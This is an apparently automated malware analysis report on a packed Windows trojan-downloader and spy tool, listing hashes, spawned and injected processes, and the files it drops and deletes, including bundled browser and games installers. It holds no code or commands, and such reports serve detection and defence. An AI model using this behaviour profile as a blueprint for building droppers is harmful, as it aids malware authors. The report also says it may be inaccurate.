Trojan-Downloader.Win32.Genome.tucb (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: db205e63f226072be250a9a94dfa3731
SHA1: 2f8b534c2e80100feb0721ce084e1b3de9e578ac
SHA256: 461fffce26e3757cab94c4b3f1a2c9a5966088033ea19324df9ce62fdf5411cb
SSDeep: 6144:Ge34/iec9Ys3cT44CWhU2DK9kr6WDRo7nBkBh 8u9uF4R6NRrXzdNGgMCzN72eOI:yiekG3bxrLo7SBh I4UNth0gL6eOI
Size: 342996 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Destiny Media
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
nsb27.tmp:1920
nst20.tmp:1040
nsh37.tmp:1376
nss2A.tmp:1600
nss2A.tmp:228
gmsd_re_005010082.exe:436
tasklist.exe:1920
tasklist.exe:1068
setup.exe:268
nsn4.tmp:224
taskkill.exe:484
taskkill.exe:220
wmic.exe:1524
amisid.exe:224
amisid.exe:1228
nsp1D.tmp:1376
%original file name%.exe:1704
nsd3C.tmp:1776
nsd3C.tmp:848
2835.exe:792
encrypt.exe:644
encrypt.exe:1796
encrypt.exe:1900
encrypt.exe:1484
upgmsd_re_005010082.exe:380
nsd33.tmp:432
nskA.tmp:1676
nsc14.tmp:1452
The SpyTool injects its code into the following process(es):
nsc43.tmp:1632
nsy18.tmp:1632
taskkill.exe:1632
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process nsb27.tmp:1920 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss2B.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2A.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Bundle_OperaRUnew[1].exe (7288 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2B.tmp\inetc.dll (0 bytes)
The process nst20.tmp:1040 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse22.tmp (0 bytes)
The process nsh37.tmp:1376 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\checks.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[2].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3A.tmp (6012 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi39.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3B.tmp\Registry.dll (0 bytes)
The process nsc43.tmp:1632 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn47.tmp (102710 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup[2].exe (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (3413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz48.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\BiTool[1].dll (4152 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi45.tmp (0 bytes)
The process nss2A.tmp:1600 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\thankyou[1].php (14 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\Registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx30.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi32.tmp\nsisos.dll (0 bytes)
The process nss2A.tmp:228 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\Registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2D.tmp (6085 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\amisid.exe (1856 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\Registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2E.tmp (0 bytes)
The process gmsd_re_005010082.exe:436 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\gmsd_re_005010082\1.20\cnf.cyl (269 bytes)
The process setup.exe:268 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
The SpyTool deletes the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\mybrowser.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3290\prefs (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217 (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source268_21217\Chrome-bin (0 bytes)
The process nsy18.tmp:1632 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1B.tmp (7695 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1A.tmp (0 bytes)
The process nsn4.tmp:224 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj7.tmp (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA.tmp (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nskB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process wmic.exe:1524 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
The process nsp1D.tmp:1376 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\2835.exe (14988 bytes)
The process %original file name%.exe:1704 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (9771 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (15 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
The process nsd3C.tmp:1776 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-H57RU.tmp\nsd3C.tmp (3779 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-H57RU.tmp\nsd3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-H57RU.tmp (0 bytes)
The process nsd3C.tmp:848 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-73DD7.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-QHO3I.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-F8943.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010082\upgmsd_re_005010082.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-FI91J.tmp (15278 bytes)
%Program Files%\gmsd_re_005010082\unins000.msg (375 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\upgmsd_re_005010082.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gmsd_re_005010082.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\is-OHVJR.tmp (7433 bytes)
%Program Files%\gmsd_re_005010082\unins000.dat (29081 bytes)
%Program Files%\gmsd_re_005010082\gmsd_re_005010082.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-4OD0U.tmp (4 bytes)
%Program Files%\gmsd_re_005010082\is-SLOUM.tmp (22284 bytes)
%Program Files%\gmsd_re_005010082\predm.exe (2321 bytes)
%Program Files%\gmsd_re_005010082\gamesdesktop_widget.exe (77294 bytes)
The SpyTool deletes the following file(s):
